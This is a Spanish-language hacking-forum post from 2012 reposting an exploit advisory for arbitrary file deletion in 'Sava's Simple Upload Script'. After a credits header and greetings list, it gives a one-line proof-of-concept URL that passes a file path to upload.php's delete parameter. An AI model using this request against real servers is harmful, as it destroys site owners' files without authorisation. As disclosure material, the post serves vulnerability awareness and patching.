Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
Cargando

Autor Tema: Sava’s Simple Upload Script / Delete Arbitrary File  (Leído 141 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado #RemoteExecution

  • Conociendo la comunidad [L2]
  • **
  • Topic Author
  • Mensajes: 119
    • Ver Perfil
Sava’s Simple Upload Script / Delete Arbitrary File
« en: Julio 04, 2012, 05:41:33 am »
# Exploit Title: Sava's Simple Upload Script / Delete Arbitrary File
 # Date: 03/07/2012
 # Author: Daniel Godoy
 # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
 # Author Web: www.delincuentedigital.com.ar
 # Sofware web: http://savasplace.com/wp-content/plugins/downloads-manager/upload/upload.tgz
 # Tested on: Linux
 #
 # www.chap.cl
 # Este Advisory fue descubierto por Daniel Godoy, integrante de Project CHAP Security
 # be secured / stay secure
 # contacto@chap.cl
 
 
 [Comment]
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
 Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion, ksha, zerial,LinuxFer, Scorp
 her0, r0dr1 y demas user de RemoteExecution
 www.remoteexecution.info www.remoteexcution.com.ar
 #RemoteExecution Hacking Group
 
 [PoC]
 http://localhost/upload.php?delete=files/document.gif